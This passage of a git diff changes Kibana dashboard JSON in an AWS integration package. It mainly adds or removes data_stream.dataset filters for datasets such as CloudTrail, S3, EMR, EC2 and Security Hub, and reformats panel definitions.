b/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json index 4fe55589e443..8925c057c5f5 100644 --- a/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json +++ b/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json @@ -3,7 +3,29 @@ "description": "Logs AWS S3 Server Access Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.s3access" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.s3access" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json b/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json index 6af83312e607..dcff494a409f 100644 --- a/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json +++ b/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json @@ -8,7 +8,35 @@ "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}" }, "kibanaSavedObjectMeta": { - "searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"aws.apigateway_logs\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"aws.apigateway_logs\"}},\"$state\":{\"store\":\"appState\"}}]}" + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.apigateway_logs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.apigateway_logs" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } }, "optionsJSON": { "hidePanelTitles": false, diff --git a/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json b/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json index c06f858c2a94..01f79837ceb1 100644 --- a/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json +++ b/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json @@ -1299,29 +1299,7 @@ } } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filter-index-pattern-0", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.s3_storage_lens" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.s3_storage_lens" - } - } - } - ], + "filters": [], "query": { "language": "kuery", "query": "" @@ -1646,29 +1624,7 @@ } } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filter-index-pattern-0", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.s3_storage_lens" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.s3_storage_lens" - } - } - } - ], + "filters": [], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json b/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json index b680661a5f97..305a665d1609 100644 --- a/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json +++ b/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json @@ -4,10 +4,32 @@ "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.securityhub_findings" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.securityhub_findings" + } + } + } + ], "query": { "language": "kuery", - "query": "data_stream.dataset : \"aws.securityhub_findings\"" + "query": "" } } }, diff --git a/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json b/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json index fcc4515d1a49..9f9f90eaefb0 100644 --- a/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json +++ b/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json @@ -9,7 +9,29 @@ "description": "Overview of AWS EMR Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.emr_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.emr_metrics" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json b/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json index 99bace034433..4be514fc6d9e 100644 --- a/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json +++ b/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json @@ -158,29 +158,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ac6db275-2ddb-41f1-b203-c8fab3ca7e72", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -375,29 +353,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "67c166a6-891b-47b5-a916-28eb114c129b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -529,29 +485,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "df9eca25-d687-47e3-a729-395cdce4b952", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -681,29 +615,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "36383587-6745-42e7-be57-db8876de435e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -833,29 +745,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "15d4ec78-9b38-428a-a871-c2a8c5849d30", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -1001,29 +891,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0c6c1e85-98f6-499c-a84a-b9056ee6387b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", diff --git a/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json b/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json index c74617321d0d..5967e4b51e2d 100644 --- a/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json +++ b/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json @@ -10,7 +10,48 @@ "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "aws.s3_daily_storage", + "aws.s3_request", + "aws.s3_storage_lens" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "aws.s3_daily_storage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_request" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_storage_lens" + } + } + ] + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json b/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json index 2d9223aeb009..7d74a34a8c84 100644 --- a/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json +++ b/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json @@ -2003,62 +2003,62 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "9db00c20-491e-44e9-8e52-9bb7f60ac7ce:indexpattern-datasource-layer-e60d1b84-415e-4754-86f0-96074ef1cde1", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "name": "d8a799fc-c724-4dcf-8724-2d0c3e3bb153:indexpattern-datasource-layer-a559bd73-35ec-477a-8752-2c2cfb51f8d9", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "325613ee-eabb-45e4-af99-81f54b11af15:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "41a4b2d0-35d8-4306-9d63-51916db9b913:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "name": "3d0f29c6-bb4b-42e4-9453-5c8af99d0b60:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "5ca66947-bafc-4e89-a245-bbb3967281c6:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "0aab01fe-67f3-4f6e-9323-c07192dd1bd2:indexpattern-datasource-layer-8e802b8a-241a-42a9-b6fe-64d720488b94" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "ff904fbb-5539-495f-a7cd-ea1115b76c70:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "name": "controlGroup_6ea93fab-4b92-4842-b642-73904edf5146:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_9beedf6d-2ccc-44f0-ba7a-fb632655a7c2:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_358aee6c-253a-46a7-9b12-1aa54b026157:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - } + } ], "type": "dashboard" } \ No newline at end of file diff --git a/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json b/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json index f06105b7103d..170c8091bde9 100644 --- a/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json +++ b/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json @@ -9,7 +9,29 @@ "description": "Overview of AWS EC2 Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.ec2_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.ec2_metrics" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json b/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json index 37a0d1f9fc7a..b36161b2124d 100644 --- a/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json +++ b/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json @@ -4,10 +4,45 @@ "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "aws.securityhub_findings", + "aws.securityhub_insights" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "aws.securityhub_findings" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.securityhub_insights" + } + } + ] + } + } + } + ], "query": { "language": "kuery", - "query": "data_stream.dataset : \"aws.securityhub_findings\" or data_stream.dataset : \"aws.securityhub_insights\"" + "query": "" } } }, diff --git a/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json b/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json index 3bbffa9f77b7..46f4e29ed89c 100644 --- a/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json +++ b/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json @@ -47,1939 +47,1939 @@ "useMargins": true }, "panelsJSON": [ - { - "version": "8.9.0", - "type": "visualization", - "gridData": { - "h": 7, - "i": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 13, - "markdown": "Navigation \n \n[REST Dashboard](#/dashboard/aws-bff88770-56d6-11ee-893f-c96e4c6c871e) | __[HTTP Dashboard](#/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e)__ | [WebSocket Dashboard](#/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e)\n\nThis dashboard provides Stage level metrics for HTTP APIs deployed through AWS API Gateway.", - "openLinksInNewTab": true - }, - "title": "", - "type": "markdown", - "uiState": {} - } - } + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", + "w": 24, + "x": 0, + "y": 0 }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 7, - "i": "7c57d40d-fc76-48d5-a436-55a498d56910", - "w": 12, - "x": 24, - "y": 0 - }, - "panelIndex": "7c57d40d-fc76-48d5-a436-55a498d56910", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "14e551f8-dfa7-437b-ac75-0e196533af38": { - "columnOrder": [ - "9c3f1290-a36a-452e-9beb-ead1fb42ce38" - ], - "columns": { - "9c3f1290-a36a-452e-9beb-ead1fb42ce38": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " - }, - "isBucketed": false, - "label": "Total Count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Count.sum" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - } - }, - "filters": [], - "internalReferences": [], + "panelIndex": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], "query": { "language": "kuery", "query": "" - }, - "visualization": { - "layerId": "14e551f8-dfa7-437b-ac75-0e196533af38", - "layerType": "data", - "metricAccessor": "9c3f1290-a36a-452e-9beb-ead1fb42ce38" } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + } + }, + "description": "", + "params": { + "fontSize": 13, + "markdown": "Navigation \n \n[REST Dashboard](#/dashboard/aws-bff88770-56d6-11ee-893f-c96e4c6c871e) | __[HTTP Dashboard](#/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e)__ | [WebSocket Dashboard](#/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e)\n\nThis dashboard provides Stage level metrics for HTTP APIs deployed through AWS API Gateway.", + "openLinksInNewTab": true }, - "enhancements": {} + "title": "", + "type": "markdown", + "uiState": {} } + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "7c57d40d-fc76-48d5-a436-55a498d56910", + "w": 12, + "x": 24, + "y": 0 }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 7, - "i": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", - "w": 12, - "x": 36, - "y": 0 - }, - "panelIndex": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsMetric", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" - } - ], - "state": { - "visualization": { - "layerId": "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a", - "layerType": "data", - "metricAccessor": "3db90e65-15bf-48a8-b430-018274aa341d" - }, - "query": { - "language": "kuery", - "query": "" - }, - "filters": [], - "datasourceStates": { - "formBased": { - "layers": { - "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a": { - "columnOrder": [ - "3db90e65-15bf-48a8-b430-018274aa341d" - ], - "columns": { - "3db90e65-15bf-48a8-b430-018274aa341d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " - }, - "isBucketed": false, - "label": "Total Average Latency", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "compact": true, - "suffix": "ms" - } - } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Latency.avg" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "panelIndex": "7c57d40d-fc76-48d5-a436-55a498d56910", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "14e551f8-dfa7-437b-ac75-0e196533af38": { + "columnOrder": [ + "9c3f1290-a36a-452e-9beb-ead1fb42ce38" + ], + "columns": { + "9c3f1290-a36a-452e-9beb-ead1fb42ce38": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " + }, + "isBucketed": false, + "label": "Total Count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Count.sum" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "14e551f8-dfa7-437b-ac75-0e196533af38", + "layerType": "data", + "metricAccessor": "9c3f1290-a36a-452e-9beb-ead1fb42ce38" } }, - "enhancements": {} - } - }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", - "w": 24, - "x": 0, - "y": 7 + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" }, - "panelIndex": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" + "enhancements": {} + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsMetric", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" + } + ], + "state": { + "visualization": { + "layerId": "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a", + "layerType": "data", + "metricAccessor": "3db90e65-15bf-48a8-b430-018274aa341d" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [], + "datasourceStates": { + "formBased": { + "layers": { + "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a": { + "columnOrder": [ + "3db90e65-15bf-48a8-b430-018274aa341d" + ], + "columns": { + "3db90e65-15bf-48a8-b430-018274aa341d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " + }, + "isBucketed": false, + "label": "Total Average Latency", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "compact": true, + "suffix": "ms" + } + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Latency.avg" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.Count.sum", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } + }, + "internalReferences": [], + "adHocDataViews": {} + } + }, + "enhancements": {} + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", + "w": 24, + "x": 0, + "y": 7 + }, + "panelIndex": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.Count.sum", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Count.sum" + } }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Count.sum" + }, + "21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Count.sum", - "key": "aws.apigateway.metrics.Count.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Count.sum" - } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Count.sum", + "key": "aws.apigateway.metrics.Count.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Count.sum" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": 